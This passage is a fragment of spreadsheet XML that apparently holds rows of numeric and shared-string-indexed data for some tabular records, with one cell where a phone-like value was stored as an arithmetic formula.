      <c r="AX1051">
        <v>1</v>
      </c>
      <c r="AY1051">
        <v>1</v>
      </c>
      <c r="AZ1051">
        <v>1</v>
      </c>
      <c r="BA1051" t="s">
        <v>17572</v>
      </c>
      <c r="BB1051">
        <v>0</v>
      </c>
      <c r="BC1051" t="s">
        <v>9638</v>
      </c>
      <c r="BD1051" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="1052" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1052">
        <v>5034</v>
      </c>
      <c r="B1052" t="s">
        <v>7976</v>
      </c>
      <c r="C1052" t="s">
        <v>3013</v>
      </c>
      <c r="D1052" t="s">
        <v>7977</v>
      </c>
      <c r="E1052" t="s">
        <v>3906</v>
      </c>
      <c r="F1052" t="s">
        <v>7978</v>
      </c>
      <c r="G1052" s="1">
        <v>44188</v>
      </c>
      <c r="H1052">
        <v>7204</v>
      </c>
      <c r="I1052">
        <v>7204</v>
      </c>
      <c r="J1052">
        <v>0</v>
      </c>
      <c r="K1052">
        <v>1</v>
      </c>
      <c r="L1052">
        <v>0</v>
      </c>
      <c r="M1052">
        <v>0</v>
      </c>
      <c r="N1052">
        <v>0</v>
      </c>
      <c r="O1052">
        <v>0</v>
      </c>
      <c r="P1052">
        <v>0</v>
      </c>
      <c r="Q1052">
        <v>1</v>
      </c>
      <c r="R1052">
        <v>10</v>
      </c>
      <c r="S1052">
        <v>0</v>
      </c>
      <c r="T1052">
        <v>1</v>
      </c>
      <c r="U1052">
        <v>0</v>
      </c>
      <c r="V1052">
        <v>2000</v>
      </c>
      <c r="W1052">
        <v>0</v>
      </c>
      <c r="X1052">
        <v>0</v>
      </c>
      <c r="Y1052">
        <v>0</v>
      </c>
      <c r="Z1052">
        <v>0</v>
      </c>
      <c r="AA1052">
        <v>0</v>
      </c>
      <c r="AB1052">
        <v>100</v>
      </c>
      <c r="AC1052">
        <v>1000</v>
      </c>
      <c r="AD1052">
        <v>0</v>
      </c>
      <c r="AE1052">
        <v>1000</v>
      </c>
      <c r="AF1052" t="s">
        <v>7979</v>
      </c>
      <c r="AG1052">
        <v>28912</v>
      </c>
      <c r="AH1052">
        <v>4</v>
      </c>
      <c r="AJ1052">
        <v>84</v>
      </c>
      <c r="AK1052" t="s">
        <v>3568</v>
      </c>
      <c r="AL1052" t="s">
        <v>7980</v>
      </c>
      <c r="AM1052" t="s">
        <v>7981</v>
      </c>
      <c r="AN1052" t="s">
        <v>68</v>
      </c>
      <c r="AO1052">
        <v>2019</v>
      </c>
      <c r="AP1052">
        <v>81364294896</v>
      </c>
      <c r="AQ1052" t="s">
        <v>7982</v>
      </c>
      <c r="AR1052" t="s">
        <v>7979</v>
      </c>
      <c r="AS1052" t="s">
        <v>71</v>
      </c>
      <c r="AT1052" t="s">
        <v>72</v>
      </c>
      <c r="AU1052">
        <v>14</v>
      </c>
      <c r="AV1052">
        <v>1</v>
      </c>
      <c r="AW1052">
        <v>2</v>
      </c>
      <c r="AX1052">
        <v>0</v>
      </c>
      <c r="AY1052">
        <v>7</v>
      </c>
      <c r="AZ1052">
        <v>1</v>
      </c>
      <c r="BA1052" t="s">
        <v>17546</v>
      </c>
      <c r="BB1052">
        <v>0</v>
      </c>
      <c r="BC1052">
        <v>0</v>
      </c>
      <c r="BD1052" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="1053" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1053">
        <v>5010</v>
      </c>
      <c r="B1053" t="s">
        <v>7983</v>
      </c>
      <c r="C1053" t="s">
        <v>129</v>
      </c>
      <c r="D1053" t="s">
        <v>7261</v>
      </c>
      <c r="E1053" t="s">
        <v>363</v>
      </c>
      <c r="F1053" t="s">
        <v>7984</v>
      </c>
      <c r="G1053" s="1">
        <v>44160</v>
      </c>
      <c r="H1053">
        <v>7215</v>
      </c>
      <c r="I1053">
        <v>7215</v>
      </c>
      <c r="J1053">
        <v>0</v>
      </c>
      <c r="K1053">
        <v>0</v>
      </c>
      <c r="L1053">
        <v>0</v>
      </c>
      <c r="M1053">
        <v>0</v>
      </c>
      <c r="N1053">
        <v>0</v>
      </c>
      <c r="O1053">
        <v>0</v>
      </c>
      <c r="P1053">
        <v>0</v>
      </c>
      <c r="Q1053">
        <v>1</v>
      </c>
      <c r="R1053">
        <v>0</v>
      </c>
      <c r="S1053">
        <v>0</v>
      </c>
      <c r="T1053">
        <v>1</v>
      </c>
      <c r="U1053">
        <v>0</v>
      </c>
      <c r="V1053">
        <v>0</v>
      </c>
      <c r="W1053">
        <v>0</v>
      </c>
      <c r="X1053">
        <v>0</v>
      </c>
      <c r="Y1053">
        <v>0</v>
      </c>
      <c r="Z1053">
        <v>0</v>
      </c>
      <c r="AA1053">
        <v>0</v>
      </c>
      <c r="AB1053">
        <v>500</v>
      </c>
      <c r="AC1053">
        <v>0</v>
      </c>
      <c r="AD1053">
        <v>0</v>
      </c>
      <c r="AE1053">
        <v>10000</v>
      </c>
      <c r="AF1053" t="s">
        <v>7985</v>
      </c>
      <c r="AG1053">
        <v>15121</v>
      </c>
      <c r="AH1053">
        <v>11</v>
      </c>
      <c r="AJ1053">
        <v>270</v>
      </c>
      <c r="AK1053" t="s">
        <v>620</v>
      </c>
      <c r="AL1053" t="s">
        <v>7264</v>
      </c>
      <c r="AM1053" t="s">
        <v>7986</v>
      </c>
      <c r="AN1053" t="s">
        <v>68</v>
      </c>
      <c r="AO1053">
        <v>2020</v>
      </c>
      <c r="AP1053">
        <v>85692365555</v>
      </c>
      <c r="AQ1053" t="s">
        <v>7987</v>
      </c>
      <c r="AR1053" t="s">
        <v>7985</v>
      </c>
      <c r="AS1053" t="s">
        <v>71</v>
      </c>
      <c r="AT1053" t="s">
        <v>72</v>
      </c>
      <c r="AU1053">
        <v>26</v>
      </c>
      <c r="AV1053">
        <v>1</v>
      </c>
      <c r="AW1053">
        <v>8</v>
      </c>
      <c r="AX1053">
        <v>2</v>
      </c>
      <c r="AY1053">
        <v>4</v>
      </c>
      <c r="AZ1053">
        <v>1</v>
      </c>
      <c r="BA1053" t="s">
        <v>17530</v>
      </c>
      <c r="BB1053">
        <v>0</v>
      </c>
      <c r="BC1053">
        <v>0</v>
      </c>
      <c r="BD1053" t="s">
        <v>12466</v>
      </c>
    </row>
    <row r="1054" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1054">
        <v>4965</v>
      </c>
      <c r="B1054" t="s">
        <v>7988</v>
      </c>
      <c r="C1054" t="s">
        <v>99</v>
      </c>
      <c r="D1054" t="s">
        <v>7989</v>
      </c>
      <c r="E1054" t="s">
        <v>142</v>
      </c>
      <c r="F1054" t="s">
        <v>7990</v>
      </c>
      <c r="G1054" s="1">
        <v>44168</v>
      </c>
      <c r="H1054">
        <v>7225</v>
      </c>
      <c r="I1054">
        <v>7225</v>
      </c>
      <c r="J1054">
        <v>0</v>
      </c>
      <c r="K1054">
        <v>1</v>
      </c>
      <c r="L1054">
        <v>0</v>
      </c>
      <c r="M1054">
        <v>0</v>
      </c>
      <c r="N1054">
        <v>0</v>
      </c>
      <c r="O1054">
        <v>0</v>
      </c>
      <c r="P1054">
        <v>0</v>
      </c>
      <c r="Q1054">
        <v>0</v>
      </c>
      <c r="R1054">
        <v>0</v>
      </c>
      <c r="S1054">
        <v>0</v>
      </c>
      <c r="T1054">
        <v>0</v>
      </c>
      <c r="U1054">
        <v>0</v>
      </c>
      <c r="V1054">
        <v>500000</v>
      </c>
      <c r="W1054">
        <v>0</v>
      </c>
      <c r="X1054">
        <v>0</v>
      </c>
      <c r="Y1054">
        <v>0</v>
      </c>
      <c r="Z1054">
        <v>0</v>
      </c>
      <c r="AA1054">
        <v>0</v>
      </c>
      <c r="AB1054">
        <v>0</v>
      </c>
      <c r="AC1054">
        <v>0</v>
      </c>
      <c r="AD1054">
        <v>0</v>
      </c>
      <c r="AE1054">
        <v>0</v>
      </c>
      <c r="AF1054" t="s">
        <v>7991</v>
      </c>
      <c r="AG1054">
        <v>14440</v>
      </c>
      <c r="AH1054">
        <v>12</v>
      </c>
      <c r="AJ1054">
        <v>160</v>
      </c>
      <c r="AK1054" t="s">
        <v>114</v>
      </c>
      <c r="AL1054" t="s">
        <v>114</v>
      </c>
      <c r="AM1054" t="s">
        <v>7992</v>
      </c>
      <c r="AN1054" t="s">
        <v>55</v>
      </c>
      <c r="AO1054">
        <v>2010</v>
      </c>
      <c r="AP1054" t="s">
        <v>7993</v>
      </c>
      <c r="AQ1054" t="s">
        <v>7994</v>
      </c>
      <c r="AR1054" t="s">
        <v>7995</v>
      </c>
      <c r="AU1054">
        <v>27</v>
      </c>
      <c r="AV1054">
        <v>0</v>
      </c>
      <c r="AW1054">
        <v>3</v>
      </c>
      <c r="AX1054">
        <v>0</v>
      </c>
      <c r="AY1054">
        <v>2</v>
      </c>
      <c r="AZ1054">
        <v>0</v>
      </c>
      <c r="BA1054" t="s">
        <v>17516</v>
      </c>
      <c r="BB1054" t="s">
        <v>17528</v>
      </c>
      <c r="BC1054" t="s">
        <v>9550</v>
      </c>
      <c r="BD1054" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="1055" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1055">
        <v>5078</v>
      </c>
      <c r="B1055" t="s">
        <v>7996</v>
      </c>
      <c r="C1055" t="s">
        <v>157</v>
      </c>
      <c r="D1055" t="s">
        <v>7997</v>
      </c>
      <c r="E1055" t="s">
        <v>76</v>
      </c>
      <c r="F1055" t="s">
        <v>7998</v>
      </c>
      <c r="G1055" s="1">
        <v>44263</v>
      </c>
      <c r="H1055">
        <v>7231</v>
      </c>
      <c r="I1055">
        <v>7231</v>
      </c>
      <c r="J1055">
        <v>0</v>
      </c>
      <c r="K1055">
        <v>0</v>
      </c>
      <c r="L1055">
        <v>0</v>
      </c>
      <c r="M1055">
        <v>3</v>
      </c>
      <c r="N1055">
        <v>0</v>
      </c>
      <c r="O1055">
        <v>0</v>
      </c>
      <c r="P1055">
        <v>0</v>
      </c>
      <c r="Q1055">
        <v>0</v>
      </c>
      <c r="R1055">
        <v>0</v>
      </c>
      <c r="S1055">
        <v>0</v>
      </c>
      <c r="T1055">
        <v>1</v>
      </c>
      <c r="U1055">
        <v>0</v>
      </c>
      <c r="V1055">
        <v>0</v>
      </c>
      <c r="W1055">
        <v>0</v>
      </c>
      <c r="X1055">
        <v>300</v>
      </c>
      <c r="Y1055">
        <v>0</v>
      </c>
      <c r="Z1055">
        <v>0</v>
      </c>
      <c r="AA1055">
        <v>0</v>
      </c>
      <c r="AB1055">
        <v>0</v>
      </c>
      <c r="AC1055">
        <v>0</v>
      </c>
      <c r="AD1055">
        <v>0</v>
      </c>
      <c r="AE1055">
        <v>300</v>
      </c>
      <c r="AF1055" t="s">
        <v>7999</v>
      </c>
      <c r="AG1055">
        <v>63514</v>
      </c>
      <c r="AH1055">
        <v>16</v>
      </c>
      <c r="AJ1055">
        <v>228</v>
      </c>
      <c r="AK1055" t="s">
        <v>6541</v>
      </c>
      <c r="AL1055" t="s">
        <v>6542</v>
      </c>
      <c r="AM1055" t="s">
        <v>8000</v>
      </c>
      <c r="AN1055" t="s">
        <v>68</v>
      </c>
      <c r="AO1055">
        <v>2010</v>
      </c>
      <c r="AP1055">
        <v>87702360127</v>
      </c>
      <c r="AQ1055" t="s">
        <v>8001</v>
      </c>
      <c r="AR1055" t="s">
        <v>7999</v>
      </c>
      <c r="AS1055" t="s">
        <v>71</v>
      </c>
      <c r="AT1055" t="s">
        <v>72</v>
      </c>
      <c r="AU1055">
        <v>25</v>
      </c>
      <c r="AV1055">
        <v>1</v>
      </c>
      <c r="AW1055">
        <v>0</v>
      </c>
      <c r="AX1055">
        <v>4</v>
      </c>
      <c r="AY1055">
        <v>1</v>
      </c>
      <c r="AZ1055">
        <v>1</v>
      </c>
      <c r="BA1055" t="s">
        <v>17570</v>
      </c>
      <c r="BB1055">
        <v>0</v>
      </c>
      <c r="BC1055" t="s">
        <v>12428</v>
      </c>
      <c r="BD1055">
        <v>0</v>
      </c>
    </row>
    <row r="1056" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1056">
        <v>5105</v>
      </c>
      <c r="B1056" t="s">
        <v>8002</v>
      </c>
      <c r="C1056" t="s">
        <v>157</v>
      </c>
      <c r="D1056" t="s">
        <v>8003</v>
      </c>
      <c r="E1056" t="s">
        <v>8004</v>
      </c>
      <c r="F1056" t="s">
        <v>8005</v>
      </c>
      <c r="G1056" s="1">
        <v>44300</v>
      </c>
      <c r="H1056">
        <v>7244</v>
      </c>
      <c r="I1056">
        <v>7244</v>
      </c>
      <c r="J1056">
        <v>0</v>
      </c>
      <c r="K1056">
        <v>0</v>
      </c>
      <c r="L1056">
        <v>0</v>
      </c>
      <c r="M1056">
        <v>4</v>
      </c>
      <c r="N1056">
        <v>0</v>
      </c>
      <c r="O1056">
        <v>0</v>
      </c>
      <c r="P1056">
        <v>0</v>
      </c>
      <c r="Q1056">
        <v>0</v>
      </c>
      <c r="R1056">
        <v>0</v>
      </c>
      <c r="S1056">
        <v>0</v>
      </c>
      <c r="T1056">
        <v>1</v>
      </c>
      <c r="U1056">
        <v>0</v>
      </c>
      <c r="V1056">
        <v>0</v>
      </c>
      <c r="W1056">
        <v>0</v>
      </c>
      <c r="X1056">
        <v>300</v>
      </c>
      <c r="Y1056">
        <v>0</v>
      </c>
      <c r="Z1056">
        <v>0</v>
      </c>
      <c r="AA1056">
        <v>0</v>
      </c>
      <c r="AB1056">
        <v>0</v>
      </c>
      <c r="AC1056">
        <v>0</v>
      </c>
      <c r="AD1056">
        <v>0</v>
      </c>
      <c r="AE1056">
        <v>300</v>
      </c>
      <c r="AF1056" t="s">
        <v>8006</v>
      </c>
      <c r="AG1056">
        <v>63518</v>
      </c>
      <c r="AH1056">
        <v>16</v>
      </c>
      <c r="AJ1056">
        <v>228</v>
      </c>
      <c r="AK1056" t="s">
        <v>6541</v>
      </c>
      <c r="AL1056" t="s">
        <v>2755</v>
      </c>
      <c r="AM1056" t="s">
        <v>8007</v>
      </c>
      <c r="AN1056" t="s">
        <v>68</v>
      </c>
      <c r="AO1056">
        <v>2010</v>
      </c>
      <c r="AP1056" t="s">
        <v>8008</v>
      </c>
      <c r="AQ1056" t="s">
        <v>8009</v>
      </c>
      <c r="AR1056" t="s">
        <v>8006</v>
      </c>
      <c r="AS1056" t="s">
        <v>71</v>
      </c>
      <c r="AT1056" t="s">
        <v>72</v>
      </c>
      <c r="AU1056">
        <v>25</v>
      </c>
      <c r="AV1056">
        <v>1</v>
      </c>
      <c r="AW1056">
        <v>1</v>
      </c>
      <c r="AX1056">
        <v>4</v>
      </c>
      <c r="AY1056">
        <v>1</v>
      </c>
      <c r="AZ1056">
        <v>1</v>
      </c>
      <c r="BA1056" t="s">
        <v>17585</v>
      </c>
      <c r="BB1056">
        <v>0</v>
      </c>
      <c r="BC1056" t="s">
        <v>12432</v>
      </c>
      <c r="BD1056">
        <v>0</v>
      </c>
    </row>
    <row r="1057" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1057">
        <v>5079</v>
      </c>
      <c r="B1057" t="s">
        <v>8010</v>
      </c>
      <c r="C1057" t="s">
        <v>157</v>
      </c>
      <c r="D1057" t="s">
        <v>7997</v>
      </c>
      <c r="E1057" t="s">
        <v>142</v>
      </c>
      <c r="F1057" t="s">
        <v>143</v>
      </c>
      <c r="G1057" s="1">
        <v>44263</v>
      </c>
      <c r="H1057">
        <v>7252</v>
      </c>
      <c r="I1057">
        <v>7252</v>
      </c>
      <c r="J1057">
        <v>0</v>
      </c>
      <c r="K1057">
        <v>0</v>
      </c>
      <c r="L1057">
        <v>0</v>
      </c>
      <c r="M1057">
        <v>10</v>
      </c>
      <c r="N1057">
        <v>0</v>
      </c>
      <c r="O1057">
        <v>0</v>
      </c>
      <c r="P1057">
        <v>0</v>
      </c>
      <c r="Q1057">
        <v>0</v>
      </c>
      <c r="R1057">
        <v>0</v>
      </c>
      <c r="S1057">
        <v>0</v>
      </c>
      <c r="T1057">
        <v>0</v>
      </c>
      <c r="U1057">
        <v>0</v>
      </c>
      <c r="V1057">
        <v>0</v>
      </c>
      <c r="W1057">
        <v>0</v>
      </c>
      <c r="X1057">
        <v>300</v>
      </c>
      <c r="Y1057">
        <v>0</v>
      </c>
      <c r="Z1057">
        <v>0</v>
      </c>
      <c r="AA1057">
        <v>0</v>
      </c>
      <c r="AB1057">
        <v>0</v>
      </c>
      <c r="AC1057">
        <v>0</v>
      </c>
      <c r="AD1057">
        <v>0</v>
      </c>
      <c r="AE1057">
        <v>0</v>
      </c>
      <c r="AF1057" t="s">
        <v>8011</v>
      </c>
      <c r="AG1057">
        <v>63514</v>
      </c>
      <c r="AH1057">
        <v>16</v>
      </c>
      <c r="AJ1057">
        <v>228</v>
      </c>
      <c r="AK1057" t="s">
        <v>6541</v>
      </c>
      <c r="AL1057" t="s">
        <v>6542</v>
      </c>
      <c r="AM1057" t="s">
        <v>8012</v>
      </c>
      <c r="AN1057" t="s">
        <v>68</v>
      </c>
      <c r="AO1057">
        <v>2018</v>
      </c>
      <c r="AP1057">
        <v>81803377099</v>
      </c>
      <c r="AQ1057" t="s">
        <v>8013</v>
      </c>
      <c r="AR1057" t="s">
        <v>8011</v>
      </c>
      <c r="AS1057" t="s">
        <v>71</v>
      </c>
      <c r="AT1057" t="s">
        <v>72</v>
      </c>
      <c r="AU1057">
        <v>25</v>
      </c>
      <c r="AV1057">
        <v>1</v>
      </c>
      <c r="AW1057">
        <v>4</v>
      </c>
      <c r="AX1057">
        <v>4</v>
      </c>
      <c r="AY1057">
        <v>2</v>
      </c>
      <c r="AZ1057">
        <v>2</v>
      </c>
      <c r="BA1057" t="s">
        <v>17571</v>
      </c>
      <c r="BB1057">
        <v>0</v>
      </c>
      <c r="BC1057" t="s">
        <v>12449</v>
      </c>
      <c r="BD1057">
        <v>0</v>
      </c>
    </row>
    <row r="1058" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1058">
        <v>4804</v>
      </c>
      <c r="B1058" t="s">
        <v>8014</v>
      </c>
      <c r="C1058" t="s">
        <v>157</v>
      </c>
      <c r="D1058" t="s">
        <v>8015</v>
      </c>
      <c r="E1058" t="s">
        <v>142</v>
      </c>
      <c r="F1058" t="s">
        <v>403</v>
      </c>
      <c r="G1058" s="1">
        <v>44218</v>
      </c>
      <c r="H1058">
        <v>7260</v>
      </c>
      <c r="I1058">
        <v>7260</v>
      </c>
      <c r="J1058">
        <v>4</v>
      </c>
      <c r="K1058">
        <v>0</v>
      </c>
      <c r="L1058">
        <v>3</v>
      </c>
      <c r="M1058">
        <v>0</v>
      </c>
      <c r="N1058">
        <v>0</v>
      </c>
      <c r="O1058">
        <v>0</v>
      </c>
      <c r="P1058">
        <v>0</v>
      </c>
      <c r="Q1058">
        <v>0</v>
      </c>
      <c r="R1058">
        <v>0</v>
      </c>
      <c r="S1058">
        <v>0</v>
      </c>
      <c r="T1058">
        <v>1</v>
      </c>
      <c r="U1058">
        <v>450000</v>
      </c>
      <c r="V1058">
        <v>0</v>
      </c>
      <c r="W1058">
        <v>11000</v>
      </c>
      <c r="X1058">
        <v>0</v>
      </c>
      <c r="Y1058">
        <v>0</v>
      </c>
      <c r="Z1058">
        <v>0</v>
      </c>
      <c r="AA1058">
        <v>0</v>
      </c>
      <c r="AB1058">
        <v>0</v>
      </c>
      <c r="AC1058">
        <v>0</v>
      </c>
      <c r="AD1058">
        <v>0</v>
      </c>
      <c r="AE1058">
        <v>5000</v>
      </c>
      <c r="AF1058" t="s">
        <v>8016</v>
      </c>
      <c r="AG1058">
        <v>69383</v>
      </c>
      <c r="AH1058">
        <v>16</v>
      </c>
      <c r="AJ1058">
        <v>255</v>
      </c>
      <c r="AK1058" t="s">
        <v>8017</v>
      </c>
      <c r="AL1058" t="s">
        <v>8018</v>
      </c>
      <c r="AM1058" t="s">
        <v>8019</v>
      </c>
      <c r="AN1058" t="s">
        <v>68</v>
      </c>
      <c r="AO1058">
        <v>2001</v>
      </c>
      <c r="AP1058">
        <v>811332222</v>
      </c>
      <c r="AQ1058" t="s">
        <v>8020</v>
      </c>
      <c r="AR1058" t="s">
        <v>8016</v>
      </c>
      <c r="AS1058" t="s">
        <v>71</v>
      </c>
      <c r="AT1058" t="s">
        <v>72</v>
      </c>
      <c r="AU1058">
        <v>28</v>
      </c>
      <c r="AV1058">
        <v>0</v>
      </c>
      <c r="AW1058">
        <v>0</v>
      </c>
      <c r="AX1058">
        <v>4</v>
      </c>
      <c r="AY1058">
        <v>12</v>
      </c>
      <c r="AZ1058">
        <v>9</v>
      </c>
      <c r="BA1058" t="s">
        <v>17416</v>
      </c>
      <c r="BB1058">
        <v>0</v>
      </c>
      <c r="BC1058" t="s">
        <v>12491</v>
      </c>
      <c r="BD1058">
        <v>0</v>
      </c>
    </row>
    <row r="1059" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1059">
        <v>5108</v>
      </c>
      <c r="B1059" t="s">
        <v>8021</v>
      </c>
      <c r="C1059" t="s">
        <v>99</v>
      </c>
      <c r="D1059" t="s">
        <v>8022</v>
      </c>
      <c r="E1059" t="s">
        <v>142</v>
      </c>
      <c r="F1059" t="s">
        <v>8023</v>
      </c>
      <c r="G1059" s="1">
        <v>44258</v>
      </c>
      <c r="H1059">
        <v>7269</v>
      </c>
      <c r="I1059">
        <v>7269</v>
      </c>
      <c r="J1059">
        <v>1</v>
      </c>
      <c r="K1059">
        <v>0</v>
      </c>
      <c r="L1059">
        <v>1</v>
      </c>
      <c r="M1059">
        <v>0</v>
      </c>
      <c r="N1059">
        <v>0</v>
      </c>
      <c r="O1059">
        <v>0</v>
      </c>
      <c r="P1059">
        <v>0</v>
      </c>
      <c r="Q1059">
        <v>0</v>
      </c>
      <c r="R1059">
        <v>0</v>
      </c>
      <c r="S1059">
        <v>0</v>
      </c>
      <c r="T1059">
        <v>0</v>
      </c>
      <c r="U1059">
        <v>500000</v>
      </c>
      <c r="V1059">
        <v>0</v>
      </c>
      <c r="W1059">
        <v>50000</v>
      </c>
      <c r="X1059">
        <v>0</v>
      </c>
      <c r="Y1059">
        <v>0</v>
      </c>
      <c r="Z1059">
        <v>0</v>
      </c>
      <c r="AA1059">
        <v>0</v>
      </c>
      <c r="AB1059">
        <v>0</v>
      </c>
      <c r="AC1059">
        <v>0</v>
      </c>
      <c r="AD1059">
        <v>0</v>
      </c>
      <c r="AE1059">
        <v>0</v>
      </c>
      <c r="AF1059" t="s">
        <v>8024</v>
      </c>
      <c r="AG1059">
        <v>14440</v>
      </c>
      <c r="AH1059">
        <v>12</v>
      </c>
      <c r="AJ1059">
        <v>160</v>
      </c>
      <c r="AK1059" t="s">
        <v>114</v>
      </c>
      <c r="AL1059" t="s">
        <v>114</v>
      </c>
      <c r="AM1059" t="s">
        <v>8025</v>
      </c>
      <c r="AN1059" t="s">
        <v>68</v>
      </c>
      <c r="AO1059">
        <v>2020</v>
      </c>
      <c r="AP1059" t="s">
        <v>8026</v>
      </c>
      <c r="AQ1059" t="s">
        <v>8027</v>
      </c>
      <c r="AR1059" t="s">
        <v>8028</v>
      </c>
      <c r="AS1059" t="s">
        <v>71</v>
      </c>
      <c r="AT1059" t="s">
        <v>72</v>
      </c>
      <c r="AU1059">
        <v>24</v>
      </c>
      <c r="AV1059">
        <v>0</v>
      </c>
      <c r="AW1059">
        <v>0</v>
      </c>
      <c r="AX1059">
        <v>0</v>
      </c>
      <c r="AY1059">
        <v>15</v>
      </c>
      <c r="AZ1059">
        <v>6</v>
      </c>
      <c r="BA1059" t="s">
        <v>17587</v>
      </c>
      <c r="BB1059" t="s">
        <v>16090</v>
      </c>
      <c r="BC1059" t="s">
        <v>9550</v>
      </c>
      <c r="BD1059" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="1060" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1060">
        <v>5093</v>
      </c>
      <c r="B1060" t="s">
        <v>8029</v>
      </c>
      <c r="C1060" t="s">
        <v>726</v>
      </c>
      <c r="D1060" t="s">
        <v>8030</v>
      </c>
      <c r="E1060" t="s">
        <v>142</v>
      </c>
      <c r="F1060" t="s">
        <v>666</v>
      </c>
      <c r="G1060" s="1">
        <v>44154</v>
      </c>
      <c r="H1060">
        <v>7299</v>
      </c>
      <c r="I1060">
        <v>7299</v>
      </c>
      <c r="J1060">
        <v>1</v>
      </c>
      <c r="K1060">
        <v>0</v>
      </c>
      <c r="L1060">
        <v>1</v>
      </c>
      <c r="M1060">
        <v>0</v>
      </c>
      <c r="N1060">
        <v>0</v>
      </c>
      <c r="O1060">
        <v>0</v>
      </c>
      <c r="P1060">
        <v>0</v>
      </c>
      <c r="Q1060">
        <v>2</v>
      </c>
      <c r="R1060">
        <v>10</v>
      </c>
      <c r="S1060">
        <v>0</v>
      </c>
      <c r="T1060">
        <v>1</v>
      </c>
      <c r="U1060">
        <v>40</v>
      </c>
      <c r="V1060">
        <v>0</v>
      </c>
      <c r="W1060">
        <v>2</v>
      </c>
      <c r="X1060">
        <v>0</v>
      </c>
      <c r="Y1060">
        <v>0</v>
      </c>
      <c r="Z1060">
        <v>0</v>
      </c>
      <c r="AA1060">
        <v>0</v>
      </c>
      <c r="AB1060">
        <v>1</v>
      </c>
      <c r="AC1060">
        <v>5</v>
      </c>
      <c r="AD1060">
        <v>0</v>
      </c>
      <c r="AE1060">
        <v>2</v>
      </c>
      <c r="AF1060" t="s">
        <v>8031</v>
      </c>
      <c r="AG1060">
        <v>97813</v>
      </c>
      <c r="AH1060">
        <v>32</v>
      </c>
      <c r="AJ1060">
        <v>472</v>
      </c>
      <c r="AK1060" t="s">
        <v>8032</v>
      </c>
      <c r="AL1060" t="s">
        <v>8033</v>
      </c>
      <c r="AM1060" t="s">
        <v>8034</v>
      </c>
      <c r="AN1060" t="s">
        <v>68</v>
      </c>
      <c r="AO1060">
        <v>2020</v>
      </c>
      <c r="AP1060">
        <f>62821-2430-7103/852-4034-8248</f>
        <v>48100.663145539904</v>
      </c>
      <c r="AQ1060" t="s">
        <v>8035</v>
      </c>
      <c r="AR1060" t="s">
        <v>8036</v>
      </c>
      <c r="AS1060" t="s">
        <v>71</v>
      </c>
      <c r="AT1060" t="s">
        <v>72</v>
      </c>
      <c r="AU1060">
        <v>100</v>
      </c>
      <c r="AV1060">
        <v>0</v>
      </c>
      <c r="AW1060">
        <v>4</v>
      </c>
      <c r="AX1060">
        <v>4</v>
      </c>
      <c r="AY1060">
        <v>4</v>
      </c>
      <c r="AZ1060">
        <v>2</v>
      </c>
      <c r="BA1060" t="s">
        <v>17576</v>
      </c>
      <c r="BB1060">
        <v>0</v>
      </c>
      <c r="BC1060" t="s">
        <v>12479</v>
      </c>
      <c r="BD1060">
        <v>0</v>
      </c>
    </row>
    <row r="1061" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1061">
        <v>5086</v>
      </c>
      <c r="B1061" t="s">
        <v>8037</v>
      </c>
      <c r="C1061" t="s">
        <v>47</v>
      </c>
      <c r="D1061" t="s">
        <v>8038</v>
      </c>
      <c r="E1061" t="s">
        <v>142</v>
      </c>
      <c r="F1061" t="s">
        <v>666</v>
      </c>
      <c r="G1061" s="1">
        <v>44200</v>
      </c>
      <c r="H1061">
        <v>7354</v>
      </c>
      <c r="I1061">
        <v>7354</v>
      </c>
      <c r="J1061">
        <v>1</v>
      </c>
      <c r="K1061">
        <v>0</v>
      </c>
      <c r="L1061">
        <v>0</v>
      </c>
      <c r="M1061">
        <v>0</v>
      </c>
      <c r="N1061">
        <v>0</v>
      </c>
      <c r="O1061">
        <v>0</v>
      </c>
      <c r="P1061">
        <v>0</v>
      </c>
      <c r="Q1061">
        <v>0</v>
      </c>
      <c r="R1061">
        <v>0</v>
      </c>
      <c r="S1061">
        <v>1</v>
      </c>
      <c r="T1061">
        <v>0</v>
      </c>
      <c r="U1061">
        <v>400000</v>
      </c>
      <c r="V1061">
        <v>0</v>
      </c>
      <c r="W1061">
        <v>0</v>
      </c>
      <c r="X1061">
        <v>0</v>
      </c>
      <c r="Y1061">
        <v>0</v>
      </c>
      <c r="Z1061">
        <v>0</v>
      </c>
      <c r="AA1061">
        <v>0</v>
      </c>
      <c r="AB1061">
        <v>0</v>
      </c>
      <c r="AC1061">
        <v>0</v>
      </c>
      <c r="AD1061">
        <v>400000</v>
      </c>
      <c r="AE1061">
        <v>0</v>
      </c>
      <c r="AF1061" t="s">
        <v>8039</v>
      </c>
      <c r="AG1061">
        <v>20414</v>
      </c>
      <c r="AH1061">
        <v>2</v>
      </c>
      <c r="AJ1061">
        <v>53</v>
      </c>
      <c r="AK1061" t="s">
        <v>2220</v>
      </c>
      <c r="AL1061" t="s">
        <v>2221</v>
      </c>
      <c r="AM1061" t="s">
        <v>8040</v>
      </c>
      <c r="AN1061" t="s">
        <v>68</v>
      </c>
      <c r="AO1061">
        <v>2020</v>
      </c>
      <c r="AP1061" t="s">
        <v>1258</v>
      </c>
      <c r="AQ1061" t="s">
        <v>8041</v>
      </c>
      <c r="AR1061" t="s">
        <v>8042</v>
      </c>
      <c r="AS1061" t="s">
        <v>71</v>
      </c>
      <c r="AT1061" t="s">
        <v>72</v>
      </c>
      <c r="AU1061">
        <v>30</v>
      </c>
      <c r="AV1061">
        <v>1</v>
      </c>
      <c r="AW1061">
        <v>10</v>
      </c>
      <c r="AX1061">
        <v>0</v>
      </c>
      <c r="AY1061">
        <v>2</v>
      </c>
      <c r="AZ1061">
        <v>1</v>
      </c>
      <c r="BA1061" t="s">
        <v>17221</v>
      </c>
      <c r="BB1061" t="s">
        <v>16086</v>
      </c>
      <c r="BC1061" t="s">
        <v>12585</v>
      </c>
      <c r="BD1061">
        <v>0</v>
      </c>
    </row>
